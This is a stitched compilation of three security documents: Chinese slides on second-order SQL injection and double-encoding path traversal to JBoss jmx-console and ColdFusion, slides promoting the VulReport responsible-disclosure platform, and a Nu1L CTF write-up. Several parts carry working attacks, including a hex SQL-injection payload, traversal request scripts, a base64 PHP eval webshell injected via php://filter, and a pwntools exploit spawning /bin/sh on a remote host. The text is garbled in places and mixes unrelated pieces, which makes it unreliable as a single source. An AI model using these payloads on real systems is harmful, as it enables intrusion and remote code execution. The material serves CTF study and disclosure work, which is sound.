users WHERE name='admin'; +------+-------+------+ | id | name | pass | +------+-------+------+ | 1 | admin | pass | | 2 | admin | xxd | +------+-------+------+ 2 rows in set (0.00 sec) name: admin🍊x 🍊🐱🐶🐝💩 CVE-2013-4338 WordPress < 3.6.1 Object Injection Vulnerability CVE-2015-3438 WordPress < 4.1.2 Cross-Site Scripting Vulnerability - 錯誤的資料庫欄位型態導致⼆二次 SQL 注⼊入 #靠北⼯工程師 10418 htp://j.mp/1KiuhRZ $uid = $_GET['uid']; if ( is_numeric($uid) ) query("INSERT INTO blacklist VALUES($uid)"); $uids = query("SELECT uid FROM blacklist"); foreach ($uids as $uid) { show( query("SELECT log FROM logs WHERE uid=$uid") ); } // CREATE TABLE blacklist(id TEXT, uid TEXT, ...) 
$uid = $_GET['uid']; if ( is_numeric($uid) ) query("INSERT INTO blacklist VALUES($uid)"); $uids = query("SELECT uid FROM blacklist"); foreach ($uids as $uid) { show( query("SELECT log FROM logs WHERE uid=$uid") ); } // uid=0x31206f7220313d31 # 1 or 1=1 sql_mode = strict utf8mb4 • 問題發⽣生情境 - 使⽤用多個網⾴頁伺服器相互處理 URL ( 如 ProxyPass, mod_jk... ) http://hackme.cc/jmx-console/ http://hackme.cc/sub/.%252e/ jmx-console/ Deploy to GetShell • workers.properti es - worker.ajp1.port= 8009 - worker.ajp1.host= 127.0.0.1 - worker.ajp1.type= ajp13 • uriworkermap.pro perties - /sub/*=ajp1 - /sub=ajp1 http://hackme.cc/sub/../jmx-console/ Apache http://hackme.cc/sub/../jmx-console/ not matching /sub/*, return 404 http://hackme.cc/sub/.%2e/jmx-console/ Apache http://hackme.cc/sub/.%252e/jmx-console/ http://hackme.cc:8080/sub/.%2e/jmx-console/ JBoss http://hackme.cc:8080/sub/../jmx-console/ mod_jk • HITCON 2014 CTF - 2 / 1020 解出 • 舊版 ColdFusion 漏洞 - ColdFusion with Apache Connector - 舊版本 ColdFusion Double Encoding 造成資訊洩漏 漏洞 http://hackme.cc/admin%252f %252ehtaccess%2500.cfm Apache http://hackme.cc/admin/.htaccess <FilesMatch "^\.ht">, return 403 Apache http://hackme.cc/admin%252f.htaccess /admin%2f.htaccess not found, return 404 http://hackme.cc/admin%2f.htaccess Apache http://hackme.cc/admin%252f.htaccess%2500.cfm End with .cfm, pass to ColdFusion http://hackme.cc/admin%2f.htaccess%00.cfm ColdFusion http://hackme.cc/admin/.htaccess .cfm http://hackme.cc/admin%2f.htaccess%00.cfm
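To reproduce the Apache + mod_jk double-decoding behaviour described earlier in this section from the client side, a few plain HTTP requests are enough. The sketch below uses the example host hackme.cc and the /sub mount from the slides and assumes the requests package is available; whether the third request actually reaches /jmx-console/ depends on the target's worker mapping, exactly as explained above.

# Sketch of the client side of the mod_jk double-decoding traversal. Host and paths
# follow the slide example; some HTTP clients normalize paths, so a raw socket may be
# needed in practice.
import requests

base = "http://hackme.cc"   # front-end Apache with mod_jk (example from the slides)

# Direct request: handled (or rejected) by the front end itself.
r1 = requests.get(base + "/jmx-console/")
print("direct:", r1.status_code)

# Single-encoded dot-dot: Apache decodes it, sees /sub/../jmx-console/, no /sub/* match -> 404.
r2 = requests.get(base + "/sub/.%2e/jmx-console/")
print("single encoding:", r2.status_code)

# Double-encoded dot-dot: Apache decodes once to /sub/.%2e/..., the /sub/* worker still
# matches, and the backend decodes again, resolving /jmx-console/.
r3 = requests.get(base + "/sub/.%252e/jmx-console/")
print("double encoding:", r3.status_code)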
pdf
VulReport sylphid@vulreport.net Agenda • The current state of vulnerability disclosure • Why we built VulReport • Responsible vulnerability disclosure "Superb computer skills, but not used for a good cause" zone-h Underground Economy About VulReport • Initiated by core members of HITCON (Hacks in Taiwan Conference) • A communication channel and technical exchange platform between government, enterprises and white-hat hackers • A platform that makes government agencies and companies take vulnerabilities seriously • Improves the exchange of security-related information Don't make the hackers unhappy • Black-market industry -> security industry / public good • Exchange and improvement of skills • A shift toward a positive public image Google VRP - 1 Google VRP - 2 Google Project Zero - 1 Google Project Zero - 2 Alibaba Wooyun - 1 Wooyun - Taiwan "Taiwan is the world's fourth-largest botnet country" Everyone in the world holds something back Vulnerabilities - the key to attack and defense About VulReport • Initiated by core members of HITCON (Hacks in Taiwan Conference) • A communication channel and technical exchange platform between government, enterprises and white-hat hackers • A platform that makes government agencies and companies take vulnerabilities seriously • Improves the exchange of security-related information Why build VulReport • A Taiwanese vulnerability database • Localized reporting and communication shortens patching time • Remediation services or consulting for NGOs and small businesses that cannot fix issues themselves • Hands-on vulnerability remediation training for school security clubs • Brings together previously scattered security researchers and communities • Raises Taiwan's overall defensive capability Vulnerability report example • Vulnerability disclosure process • Vulnerability review (5 person-days) • Vendor/organization notification and confirmation (5 person-days) • Disclosure to security partners (3 days) • Disclosure to core members and domain experts (10 days) • Public disclosure (30/45/65/90 days) VulReport terms of use and disclaimer Criminal Code, Chapter 36 - Offenses Against Computer Use • Article 358: Whoever, without cause, enters another person's account and password, cracks the protection measures of a computer, or exploits a loophole in a computer system to intrude into another person's computer or related equipment shall be punished with imprisonment of up to three years, detention, or a fine of up to NT$100,000, or both. • Article 359: Whoever, without cause, obtains, deletes, or alters the electromagnetic records of another person's computer or related equipment, causing damage to the public or others, shall be punished with imprisonment of up to five years, detention, or a fine of up to NT$200,000, or both. • Article 360: Whoever, without cause, interferes with another person's computer or related equipment by means of a computer program or other electromagnetic methods, causing damage to the public or others, shall be punished with imprisonment of up to three years, detention, or a fine of up to NT$100,000, or both. • Article 361: Whoever commits any of the offenses in the preceding three articles against the computer or related equipment of a public agency shall have the punishment increased by up to one half. • Article 362: Whoever creates a computer program intended specifically for committing the offenses in this chapter, for use by themselves or others, causing damage to the public or others, shall be punished with imprisonment of up to five years, detention, or a fine of up to NT$200,000, or both. • Article 363: The offenses in Articles 358 through 360 may be prosecuted only upon complaint. VulReport milestones • 2014 Q1 preparation began • 2014 Q2 site prototype (briefly shown at HITCON FreeTalk) • 2014/11/24 public beta • 2014/12/23 fan page reached 500 likes (spreading the word through the community) • 2015/01/9 public press conference • 2015/01/10 end of the public beta / first VR vulnerability scoring contest Vulnerability score ranking (2015/1/8) Reported vulnerability statistics (2015/1/8) • Government: 11 • Enterprises: 36 • Schools: 13 • NGOs: 5 • VulReport: 5 VulReport corporate accounts • Tiers: free / standard / gold / diamond • Priority notification of reported vulnerabilities • Disclosure deadline: 30/45/65/90 • Security consulting services • Logo link • Security talent recruiting • Vulnerability data for research • Recommendation of security products or services • External service assessment (under discussion) • Details: http://goo.gl/9cbFgN wiki - responsible disclosure Responsible Vulnerability Disclosure Process Security Response Center Responsible disclosure policy - Uber responsible disclosure policy - 1 responsible disclosure policy - 2 responsible disclosure policy - 3 VulReport future plans • Happy Hackers ☺ VulReport WEB: https://vulreport.net/ FB: facebook.com/vulreport
pdf
护网杯WP-Nu1L 护网杯WP-Nu1L WEB 签到 SQLManager SimpleCalculator easyphp Pwn logger Crypto Signsystem 2EM Re gocrypt WEB 签到 js里有 SQLManager 原题:https://www.anquanke.com/post/id/200927#h3-6 SimpleCalculator 国赛原题 easyphp 读源码/index.php?page=php://filter/read=convert.base64-encode/resource=index.php,绕过死亡 die,写入aPD9waHAgZXZhbCgkX1BPU1RbY10pOz8%2B。然后包含 page=php://filter/read=convert.base64- decode/resource=sandbox/xxxxxxxx/aPD9waHAgZXZhbCgkX1BPU1RbY10pOz8%2B Pwn logger ?search=${~%A0%B8%BA%AB}[1](${~%A0%B8%BA%AB}[2])&1=phpinfo&2=0 from pwn import * # context.log_level = 'debug' # p = process('./logger') p = remote('39.105.35.195', 15333) def launch_gdb():    context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']    gdb.attach(proc.pidof(p)[0]) def once(i,c):    p.recvuntil('Exit')    p.sendline('2')    p.recvuntil('Content:')    p.send(c + '\x00')    p.recvuntil('ID:')    p.sendline(str(i)) def pwarn(c):    p.recvuntil('Exit')    p.sendline('1')    p.recvuntil('Content:')    p.send(c) def write_addr(addr,value):    base = 0x67F7B0    for i in xrange(len(value)):        # if ord(value[i]) == 0: continue        once(addr - base + i,'a' * ord(value[i])) write_addr(0x67E020,p64(0x067F7A0)) pwarn('aa') p.recvuntil('LOG: ') leak = u64((''+ p.recvuntil(': aa',drop=True)).ljust(8,'\x00')) log.info('leak libc ' + hex(leak)) # launch_gdb() libc_base = leak - 3953984 environ = 3960632 + libc_base io_vtable = 3954424 + libc_base fake_io = libc_base + 3954115 write_addr(0x67f7b0,p64(fake_io)) write_addr(0x67f7b0 + 0xd8,p64(0x67f8b0)) '''           Update with: $ gem update one_gadget && gem cleanup one_gadget 0x45226 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL 0x4527a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xf0364 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL 0xf1207 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL ''' write_addr(0x67f8b0 + 0x38,p64(libc_base +0xf1207)) Crypto Signsystem 本来以为是一个RSA的签名,没想到 encrypt 函数不是pow。 本地测试后,发现 encrypt(i, e, N) + encrypt(-i, e, N) == N 。 发一个-secret过去就能绕过check了,应该是个非预期。。 # log.info('environ : ' + hex(0x67F7B0)) write_addr(0x67F7A0,p64(0x67F7B0)) p.recvuntil('Exit') p.sendline('4') p.interactive() # !/usr/bin/env python3 import re, string from hashlib import sha256 from itertools import product from pwn import * r = remote("39.107.252.238", 10093) context.log_level = 'debug' # PoW rec = r.recvline().decode() suffix = re.findall(r'XXXX\+([^\)]+)', rec)[0] digest = re.findall(r'== ([^\n]+)', rec)[0] print(f"suffix: {suffix} \ndigest: {digest}") print('Calculating hash...') for i in product(string.ascii_letters + string.digits, repeat=4):    prefix = ''.join(i)    guess = prefix + suffix    if sha256(guess.encode()).hexdigest() == digest:        print(guess)        break r.sendafter(b'Give me XXXX:', prefix.encode()) e = 65537 r.recvuntil(b"65537 ") n = int(r.recvline()) r.recvuntil(b"The secret is ") secret = int(r.recvline()) print(n, secret) r.sendlineafter(b"plaintext:", str(-secret).encode()) r.recvuntil(b"is ") sig_neg = int(r.recvline()) sig = n - sig_neg 2EM 分析代码后,得到加密流程如下: r.sendlineafter(b"plaintext:", str(0).encode()) r.sendlineafter(b"flag", str(sig).encode()) r.interactive() xor key和pbox都是线性变化,可以用一个在GF(2)上的32*32的矩阵来表示,但是里面pbox1和pbox2 都是不可逆的,所以求不出这个矩阵。 看了一下key的位数也不是很大(才32位),encrypt函数在python里调用一下大概也就4.5微秒,48核 服务器,10min就能爆出来。 import multiprocessing as mp from tqdm import tqdm pbox1 = [22, 28, 2, 21, 3, 26, 6, 14, 7, 16, 15, 9, 17, 19, 8, 11, 10, 1, 13, 31, 23, 12, 0, 27, 4, 18, 30, 29, 
24, 20, 5, 25] pbox2 = [17, 6, 7, 27, 4, 20, 11, 22, 2, 19, 9, 24, 23, 31, 15, 10, 18, 28, 5, 0, 16, 29, 25, 8, 3, 21, 30, 12, 14, 13, 1, 26] def p(data,pbox):    tmp = bin(data)[2:].rjust(32,'0')    out = [ tmp[x] for x in pbox ]    return int(''.join(out),2) def encrypt(key,msg):    tmp1 = p(msg^key,pbox1)    tmp2 = p(tmp1^key,pbox2)    return tmp2^key def bruteforce(ranges):    start, end = ranges    for key in range(start, end): 能够得到4个key:1991722937, 2091272121, 1390799730, 1492446066 解密就完事了:        if key % 10000000 == 0:            print(key)        if encrypt(key, 3972024911) == 3661089527:            print("find: 1", key)            if encrypt(key, 722713049) == 756849098:                print("find: 2", key) def main():    CPU_CORE_NUM = 48    with mp.Pool(CPU_CORE_NUM) as pool:        reslist = pool.imap_unordered(bruteforce, [(i, i+89478487) for i in range(0, 2**32, 2**32//48)])        for res in reslist:            pool.wait() if __name__ == "__main__":    main() from Crypto.Util.number import long_to_bytes pbox1 = [22, 28, 2, 21, 3, 26, 6, 14, 7, 16, 15, 9, 17, 19, 8, 11, 10, 1, 13, 31, 23, 12, 0, 27, 4, 18, 30, 29, 24, 20, 5, 25] pbox2 = [17, 6, 7, 27, 4, 20, 11, 22, 2, 19, 9, 24, 23, 31, 15, 10, 18, 28, 5, 0, 16, 29, 25, 8, 3, 21, 30, 12, 14, 13, 1, 26] def inv_pbox(data, pbox):    tmp = bin(data)[2:].rjust(32,'0')    out = [tmp[pbox.index(i)] for i in range(32)]    return int(''.join(out),2) def dec(key, c):    tmp1 = inv_pbox(c ^ key, pbox2)    tmp2 = inv_pbox(tmp1 ^ key, pbox1)    return tmp2 ^ key enc_flag = [2670163133, 2168059145, 2670163133, 2168059145, 2640667901, 1361473960, 4285198444, 1462920522, 1669035357, 1836344829, 292090312, 1735062728, 2338346668] keys = [1991722937, 2091272121, 1390799730, 1492446066] for key in keys:    plain = b""    for enc in enc_flag:        plain += long_to_bytes(dec(key, enc))    print(plain) # b'flag{843flag{843f4cf5-8edc-49e7-9fd2-7cb31840c10f}\x00\x00' # b'flag{843flag{843f4cf5-8edc-49e7-9fd2-7cb31840c10f}\x00\x00' # b'flag{843flag{843f4cf5-8edc-49e7-9fd2-7cb31840c10f}\x00\x00' # b'flag{843flag{843f4cf5-8edc-49e7-9fd2-7cb31840c10f}\x00\x00' Re 5G # https://github.com/albusSimba/pyPolar/tree/master/polarcodes5G from polarcodes5G import * if __name__ == '__main__':    snr = 4    n = 1024    k = n // 2    myPC = Construct(n, k)    myPC.llrs = np.array([-1.756208,1.027628,-0.952465,-1.638855,-1.462390,0.208588,0.591268,-0. 179454,1.095095,0.447900,0.947692,1.350273,-1.155633,-1.938154,0.046054,1.175568 ,-0.007052,1.220866,1.890119,1.539061,0.677526,-0.493938,1.113000,1.148966,0.437 962,-1.025365,-1.001201,-0.274902,0.545109,-1.125495,-1.112381,0.214771,0.635569 ,-1.382093,0.053726,-0.196021,1.320305,-1.337450,0.422620,0.553210,0.785358,-0.6 78043,-0.368721,1.188093,-0.338528,-1.537577,1.670443,-0.885858,0.070331,-1.2159 92,1.823989,-0.929618,-0.727060,2.505745,-1.036676,-0.280815,2.160959,1.733216,- 1.889883,-0.109916,1.367643,1.077257,1.312840,1.304816,1.097788,-0.926799,-1.469 581,0.996823,0.467300,1.904864,1.661034,0.435124,0.383811,-0.786075,-0.330117,1. 
344677,1.444533,0.003463,-0.926323,-0.978224,-0.226969,1.102106,0.226237,-0.3843 20,-0.466343,-0.498517,1.842003,0.942432,-1.294573,1.018581,1.164019,-0.128555,0 .020977,-1.208346,-1.123887,-0.032598,-1.408865,0.524717,0.321672,0.852049,-1.98 8844,0.746240,-1.961841,1.564997,1.804899,-0.908426,0.896699,1.734691,-0.999090, -0.642587,-0.406924,-1.165598,1.083971,-2.301489,1.351427,0.980320,0.417626,0.61 6401,1.134201,-0.563215,-0.877332,1.501646,0.681555,-1.702605,0.523019,-1.081125 ,0.107362,2.058186,0.326459,-1.787194,1.086192,-1.055046,-1.685858,-0.930215,-0. 894009,-0.677912,0.511197,-1.098572,-0.788927,0.177513,2.140012,0.966361,0.86581 9,0.819131,-1.699320,1.568498,1.525463,-0.655758,-0.581384,-1.229248,2.183221,0. 335959,-2.642757,1.013924,-1.168649,-1.458181,-1.138616,1.700769,-0.382989,-1.72 6020,-1.532635,-0.541429,-0.968800,-0.192087,-0.507234,0.543382,1.457708,-0.0755 56,1.669304,-2.206753,-0.921022,0.900948,-0.924948,0.040101,0.633460,-1.306462,- 0.804734,0.755951,-0.342759,1.752969,-1.201860,0.799820,0.219841,3.060129,1.5517 59,1.246884,1.430198,1.411848,2.321447,-2.062636,0.958560,-0.646293,-0.980863,-0 .387100,2.045299,0.567460,-2.215653,-1.403319,0.556241,2.651569,0.292166,-0.6983 75,0.832029,-2.139115,2.283352,-1.264334,-2.478704,0.270772,-0.142261,1.136285,- 1.642062,2.994728,0.482550,-1.129786,1.177546,-0.834284,0.712862,1.140268,0.2384 46,0.362353,1.575962,-1.355559,-1.180508,1.677377,-2.135500,-2.669384,-1.522473, 0.875878,-1.008801,-0.618179,0.555532,-0.406354,-0.318404,-0.630576,1.610498,-0. 477984,0.164362,-0.830112,-1.618440,0.886848,-1.226787,-1.135281,-0.954352,-0.99 7209,1.752468,-1.700439,-1.117883,-1.989664,1.488250,-0.569408,-0.814622,-0.9165 72,1.091514,0.165200,-0.153607,2.313688,1.527322,0.994576,1.399933,0.158282,-0.1 25025,0.429315,0.516940,0.672170,1.749239,0.822672,1.568959,2.138455,-2.220479,- 0.936637,-0.634800,0.167569,-0.665847,-1.437416,-1.280923,-0.400447,1.498225,1.0 53262,-0.320818,-1.868225,-1.496732,-0.201518,0.034030,-1.689186,0.614880,0.4277 27,-1.621376,-0.546353,-0.321909,-0.611334,-0.587016,-2.244846,-0.323138,-2.0808 39,-0.953925,2.650594,-0.162808,-1.376487,-0.924629,-1.691688,0.856848,1.097273, -1.544046,-0.646544,0.317479,-1.250199,-1.017597,1.060770,2.751512,-1.258838,-1. 
488311,-1.143038,-1.744919,1.170522,0.839760,1.910438,0.995595,-0.787186,1.42375 3,-0.880153,0.862203,-1.500974,-1.260939,-1.803650,0.943106,-1.368411,1.251217,- 0.557028,0.652139,-0.203996,1.187680,-0.416745,0.581558,-2.265760,-0.474873,0.08 0722,0.446179,-0.639327,-1.647740,-0.858419,-1.402387,-1.525324,1.104080,-1.6400 21,-0.647639,0.401717,-0.708741,1.263550,-0.275298,-2.248850,-0.774760,-0.636558 ,0.562457,0.608792,-1.490242,1.013421,0.278254,-0.781737,1.277366,-0.138126,-1.1 45646,-1.050219,0.291015,0.928961,0.018285,1.004116,2.008026,1.663652,0.840205,1 .424996,0.025048,-0.621860,-0.606348,-0.535632,1.306148,-0.050246,0.503134,0.975 046,1.150712,0.578937,0.213607,-1.477498,-0.974311,-0.985866,1.014662,-0.377609, -0.888818,-0.157905,-0.662982,-0.023800,-1.711486,-0.533030,0.483448,1.421968,-2 .673275,1.159374,-0.940826,-0.491770,0.951219,-0.416862,2.044601,-1.385406,1.740 491,0.929469,1.990168,0.754986,0.493125,0.315357,2.287613,0.947665,0.981003,-0.0 81702,1.255644,-0.777866,0.239122,1.275812,-0.636307,-0.966732,-1.012288,-0.5020 24,-0.879887,0.827306,-1.783475,-0.860583,0.353817,0.168019,-1.668560,0.639837,- 0.569348,0.387230,-1.952601,-0.039584,1.421421,0.157275,-0.895116,0.686452,-0.13 2425,-1.078567,1.616315,0.187555,-1.789372,1.171706,-0.989204,1.267153,0.731109, 1.130974,1.013797,-1.417835,-0.366101,0.438512,0.175359,0.853008,1.330899,1.3720 95,-0.052560,1.212500,0.748895,-0.449058,0.549911,0.182876,0.442336,1.084044,-1. 253650,-1.216360,2.299248,0.949407,0.956618,-1.152720,1.548854,-1.217456,-0.6026 14,-1.319584,-1.529696,1.540484,0.085620,-0.259641,-1.169200,-1.316670,1.516454, 1.483575,-1.333522,-0.343909,2.483338,1.936281,1.029471,0.360799,1.331956,-1.821 326,1.351405,-1.601415,0.524290,1.610703,1.691951,0.163450,-1.426074,1.286014,1. 
070039,-1.825795,0.345390,0.219903,0.242906,-2.677871,0.952509,0.676549,-1.49237 0,1.547383,0.842538,0.608756,1.544244,0.872889,1.056120,-0.815245,0.111029,1.119 361,1.297144,-0.816438,1.573819,-0.848893,-2.928262,1.679499,1.159596,1.162540,- 1.863993,-1.254509,0.235468,-1.995178,0.604137,0.418380,0.708372,-1.183634,-0.97 1074,-1.223639,-0.919511,1.732817,-1.438610,1.545408,0.773104,-0.665660,-2.85787 4,1.415942,0.318007,-1.460877,1.478659,1.770448,0.975247,-0.079748,0.294747,0.43 9699,-0.877530,-1.121686,-1.710442,-0.498951,-1.236182,1.044201,-0.663160,1.0558 91,-1.578814,0.193263,1.311887,-1.084890,1.985518,-1.931899,-1.383116,-1.545790, 1.745142,-0.031644,1.473162,-1.170931,0.655801,-1.098930,-0.534768,-0.665807,0.7 40223,-0.730671,-1.029297,-1.005241,1.826314,-0.404923,-0.630124,-0.629364,-0.83 6373,-1.028782,-0.611658,-1.257369,-0.211007,-0.260421,-1.245970,0.772906,0.3783 62,-0.268652,0.808594,-1.411757,-0.612535,-2.272360,-0.228131,-0.443235,-2.51657 4,-1.144369,-0.964743,1.712300,-1.124629,-1.010093,0.539167,0.665459,-1.403211,- 0.760302,1.030342,0.254316,-1.158366,0.070782,0.662044,-1.219957,1.170861,-1.176 705,1.254579,-0.337905,2.079939,-0.861711,-1.241954,1.464957,-1.263635,1.001572, 1.545965,-2.070062,-0.353566,-1.174587,1.506927,-1.627372,-1.760972,-0.488558,-1 .083162,1.686407,0.613915,1.478201,0.851858,-0.251025,-0.715657,0.839277,-0.4712 78,1.666910,-1.305724,0.207877,-0.782153,1.437165,0.391036,0.566202,-0.820490,-1 .812838,-0.971692,0.533639,-1.672531,0.742608,-0.149614,-1.415937,-0.425910,0.80 9999,-0.852938,-1.790981,-1.601163,1.259779,0.075128,0.992202,-1.824626,-0.78762 6,0.889884,-1.593672,0.361373,0.683634,0.759840,2.499078,-0.260520,-0.001256,0.0 77253,0.638311,0.915541,-1.264309,0.908796,1.749505,0.203023,-1.349913,-0.694795 ,-0.533181,0.196796,2.068641,-1.771991,-1.772555,1.031747,1.357292,0.515132,1.09 5595,0.787838,-0.891284,-0.873648,-0.540499,1.118793,-1.008829,1.001822,1.475295 ,-0.235384,0.911150,-1.309131,-0.667266,0.393816,1.209631,0.873938,-1.828244,1.5 98177,2.263789,1.002235,1.210132,1.289583,0.513601,1.066601,1.919225,-0.038854,0 .785423,-1.378313,-0.489039,-0.737576,0.740496,-1.549859,-0.630046,-0.741761,-0. 776671,1.027740,1.194698,-2.153944,0.165189,1.068851,-1.525878,-1.270413,-0.3073 92,0.606630,0.875528,1.319129,0.932650,-2.396184,-1.670689,-0.970916,-0.640245,- 0.317383,-1.683889,-0.821281,-0.237230,1.431572,-0.542698,-0.502644,0.886885,-1. 100686,-1.784364,2.419862,1.813997,1.615762,-0.329475,-1.406073,-1.263815,-0.334 627,1.511375,-0.142354,-0.705305,0.973276,-1.008616,0.831885,0.351780,-0.719506, -1.335891,-0.292763,0.847991,0.650468,-1.220291,0.578187,0.490888,0.785455,-1.99 1540,1.001481,2.183888,1.668484,1.246759,-0.308238,0.882280,0.161352,1.661957,1. 
284550,-0.659829,-1.704962,1.644762,0.755891,-0.971527,-1.385948,0.811347,-0.788 184,0.811639,0.511516,1.738585,1.222464,0.200433,-0.261166,-1.716991,-1.357552,0 .777731,-1.509324,1.380187,-1.326519,2.621346,-1.151132,-1.213965,-0.706548,2.03 7775,-0.978766,-1.948199,-1.422289,-0.308394,-0.321063,-0.671179,1.743509,-0.916 104,-0.646811,0.798050,0.227600,-0.747514,0.966163,-0.849931,-0.870559,0.580033, -1.414398,-0.787516,-0.579751,-0.857700,-0.725267,1.258908,1.193013,-0.944402,-1 .125168,-0.071414,0.556080,0.937239,1.123537,-0.467957,0.213163,-0.348893,1.8557 07,0.869807,1.543800,1.057733,1.197158,1.430461,1.216461,-1.981625,-0.891747,1.4 90889,-0.828894,-2.151780,-0.702172,0.174841,0.446801,0.383394,1.340564,0.355664 ,1.221384,-0.483424,-0.857405,1.572598,-1.016775,-1.907503,1.381660,2.303773,-0. 084389,-0.426852,1.031473,1.262251,1.299562,2.359286,1.455153,1.378195,-1.559384 ,-1.538619,-0.662412,-0.372804,2.039874,-1.584868,-2.033444,-1.067252,-0.659223, -2.496581,-0.954072,0.669460,0.049117,1.128368,-1.664469,-0.261416,-1.179493,0.2 50286,-1.845250,1.491571,-0.765835,1.287766,0.792848,-0.086404,-1.610287,-2.1527 91,0.913082,0.285700,1.872948,1.865199,-1.566768,-1.159276,-0.829504,-1.917198,1 .277626,-1.208782,1.105732,0.981907,0.481393,1.191567,-0.292485,0.247654,1.28576 4,1.419050,0.491073,-1.984844,1.692819,1.603780,1.449216,-0.039562,-1.201645,-0. 939811,2.001579,-0.336064,0.990034,1.993080,-1.491785,0.237822,-0.793874,0.74992 5,-0.392913,0.945575,0.879344,0.826050,1.742768,-0.785224,0.924833,-2.199665,0.8 45972,-1.534836,1.463299,1.242056,1.841817,1.839877,0.341948,0.343022,-2.024360, 0.642739,-1.273309,1.215190,-1.616881,0.676320,-0.679882,1.037747,-0.467504,-0.3 38021,-1.717130,0.915148,-1.249030,0.770539,-1.123067,0.971105,0.615920,-0.29155 gocrypt 8,1.023345,2.343940,-1.123161,1.449990,-0.047304,-0.965352,1.850657,0.472787,0.2 42035,0.649792,0.128146,-2.427828,1.121717,-1.045283,-0.183920,-0.859471,0.72476 5,1.519884,0.136659,1.124708,-1.212589,-1.327331,0.718455,-0.439775,-0.973812,-0 .933761,-2.748310,-1.769533,-1.256789,0.821586,1.832475,-1.706277,1.075026,0.416 075,0.442156,-1.945941,0.796463,2.056993,-0.842647,-0.529708,0.516552,-0.964007, -1.274050,0.742747,0.342178,2.025093,-2.075699,-0.621430,-1.372903,1.563129,2.35 8205,-0.270784,1.102009,-1.224852,-0.975096,1.056610])    Decoder(myPC)    dec = myPC.message_received[myPC.msg_bits]    result = []    for i in range(len(dec)//8):        tmp = 0        for j in range(8):            tmp |= (dec[i*8+j] << j)        result.append(tmp)    print(bytearray(result).decode()) from z3 import * from struct import pack key = [[0xdaab, 0x2821, 0xa22c, 0x91c0, 0x7edf, 0x54c5, 0xc2e9, 0xe82d, 0xf84b, 0xbed8, 0x58be, 0xc8c, 0x6932, 0x8a68, 0xaf7d, 0x5d6b, 0x95d, 0x2ab, 0x1972, 0x74e3, 0xab63, 0xda13, 0xa319, 0xaa70], [0xb5f1, 0x334b, 0x5a87, 0xb694, 0x9bba, 0x10cb, 0x91cd, 0x7bc, 0xf84b, 0xbed8, 0x58be, 0xc8c, 0x6932, 0x8a68, 0xaf7d, 0x5d6b, 0x95d, 0x2ab, 0x1972, 0x74e3, 0xab63, 0xda13, 0xa319, 0xaa70], [0x2710, 0x8f50, 0x8385, 0xa074, 0x9d8c, 0xa8cc, 0xe992, 0x15b1, 0xf84b, 0xbed8, 0x58be, 0xc8c, 0x6932, 0x8a68, 0xaf7d, 0x5d6b, 0x95d, 0x2ab, 0x1972, 0x74e3, 0xab63, 0xda13, 0xa319, 0xaa70], [0x98a3, 0x9a50, 0xb941, 0x4fc3, 0x1005, 0x88b2, 0x605a, 0xa823, 0xf84b, 0xbed8, 0x58be, 0xc8c, 0x6932, 0x8a68, 0xaf7d, 0x5d6b, 0x95d, 0x2ab, 0x1972, 0x74e3, 0xab63, 0xda13, 0xa319, 0xaa70]] dst = [0xf84b, 0xbed8, 0x58be, 0xc8c, 0x6932, 0x8a68, 0xaf7d, 0x5d6b, 0x95d, 0x2ab, 0x1972, 0x74e3, 0xab63, 0xda13, 0xa319, 0xaa70] def rol(val, n):    return 
((val << n)&0xffff) | LShR(val, (16-n)) for i in range(len(dst)//4):    _first = BitVec(f'v0', 16)    _second = BitVec(f'v1', 16)    _third = BitVec(f'v2', 16)    _fourth = BitVec(f'v3', 16)    first = _first    second = _second    third = _third    fourth = _fourth    v18 = 0    while v18 < 7:        v21 = third        v22 = ((fourth & third) + key[i][v18] + first)&0xffff        v23 = fourth        v24 = (v22 + (second & ~fourth))&0xffff        v25 = (second + key[i][v18 + 1])&0xffff        v24 = rol(v24, 1)        v26 = v23        v27 = ((v24 & v23) + v25)&0xffff        v28 = v24        v29 = (v27 + (v21 & ~v24))&0xffff        v30 = (v21 + key[i][v18 + 2])&0xffff        v29 = rol(v29, 2)        v31 = v29        v32 = (v30 + (v28 & v29))&0xffff        v33 = v31        v34 = ((v26 & ~v31) + v32) & 0xffff        v19 = (v26 + key[i][v18 + 3])&0xffff        v34 = rol(v34, 3)        second = v33        a6 = ((v34 & v33) + v19)&0xffff        v20 = v34        fourth = (a6 + (v28 & ~v34))&0xffff        v18 += 4        fourth = rol(fourth, 5)        first = v28        third = v20    s = Solver()    s.add(first == dst[0+i*4])    s.add(second == dst[1+i*4])    s.add(third == dst[2+i*4])    s.add(fourth == dst[3+i*4])    assert s.check() == sat    m = s.model()    v = [_first, _second, _third, _fourth]    for each in v:        print(pack('>H', 0xffff&((m[each].as_long()>>8) | (m[each].as_long() << 8))).decode(), end='')
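The gocrypt script above feeds the cipher's round function to Z3 symbolically and lets the solver recover the four 16-bit input words of each block. For readers unfamiliar with that pattern, here is a much smaller, self-contained illustration of the same idea; the toy round function below is invented for the example and is not the challenge's cipher.

# Toy illustration of solver-based inversion: model the forward function over BitVecs,
# constrain the output, and ask Z3 for the input.
from z3 import BitVec, BitVecVal, RotateLeft, Solver, sat

def toy_round(x, k):
    # some simple invertible mixing on 16-bit values: xor, add, rotate
    return RotateLeft((x ^ k) + BitVecVal(0x1234, 16), 3)

key = BitVecVal(0xbeef, 16)
target = 0x5a5a                 # pretend this is the known ciphertext word

x = BitVec('x', 16)             # unknown plaintext word
s = Solver()
s.add(toy_round(x, key) == target)

assert s.check() == sat
recovered = s.model()[x].as_long()
print(hex(recovered))

# Sanity check: run the forward function concretely on the recovered value.
forward = ((recovered ^ 0xbeef) + 0x1234) & 0xffff
forward = ((forward << 3) | (forward >> 13)) & 0xffff
print(hex(forward), "== 0x5a5a")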
pdf
